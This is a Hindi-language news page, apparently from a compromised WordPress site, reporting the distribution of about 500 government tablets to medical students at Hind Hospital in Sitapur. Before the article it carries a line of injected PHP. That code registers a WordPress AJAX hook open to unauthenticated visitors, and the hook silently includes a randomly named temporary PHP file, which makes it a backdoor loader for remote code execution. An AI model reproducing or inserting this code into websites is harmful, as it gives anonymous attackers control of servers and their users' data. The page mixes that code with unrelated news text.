if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }"चिकित्सा छात्रों को मिले टैबलेट" - Current Media

“चिकित्सा छात्रों को मिले टैबलेट”

सीतापुर । आसिफ मुशीर । गत वर्षाे की भांति डिजीटल शक्ति कार्यक्रम की अगली कड़ी में उत्तर प्रदेश के मुख्यमंत्री मंत्री योगी जी का संकल्प पूरा करते हुए जनपद सीतापुर के हिंद अस्पताल में चिकित्सा छात्रों को लगभग 500 टेबलेट वितरण कार्यक्रम आयोजित किया गया।
कार्यक्रम के मुख्य अतिथि दिलीप निगम मंडल अध्यक्ष भारतीय जनता युवा मोर्चा, प्रिंसिपल डॉक्टर नर्सिंग वर्मा डायरेक्टर राजेश कुमार राय ,मुख्य चिकित्सा अधीक्षक डॉक्टर रवि सिन्हा एवं नोडल अध्धिकारी डॉ सुधीर राय, डॉ रणविजय के द्वारा हिंद अस्पताल में मेडिकल छात्रों को उत्तर प्रदेश सरकार के सौजन्य से प्राप्त टेबलेट डिवाइसेज वितरित किए गए।

इस अवसर पर सीएमएस डॉ रवि सिन्हा ने उत्तर प्रदेश सरकार के द्वारा छात्रों के हित में किये जा रहे कार्यों के बारे में बताया। प्रधानाचार्य डॉ नरसिंह वर्मा ने अपने भाषण में छात्रों को जीवन में इलेक्ट्रॉनिक डिवाइसेज के महत्व के बारे में बताया। डायरेक्टर श्री राजेश राय ने छात्रों को इलेक्ट्रॉनिक मीडिया एवं नवनीत पांडे ने डिवाइसेज के चिकित्सा में होने वाले प्रयोग के बारे में जानकारी दी।
कार्यक्रम में मंच का संचालन डॉ सुधीर राय के द्वारा किया गया ।कार्यक्रम में मुख्य रूप से भारतीय जनता युवा मोर्चा के श्री सौरभ सिंह एवं श्री नवनीत पांडे, तिरकांत अभिषेक सूरज वर्मा सुमित पुष्पेंद्र आदि उपस्थित रहे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

कोतवाली सिधौली में धूम धाम से मनाया गया स्वतंत्रता दिवस

सिधौली/सीतापुर।आसिफ मुशीर। देश की आज़ादी का दिन हमेशा से आमलोगों के लिए किसी त्योहार से …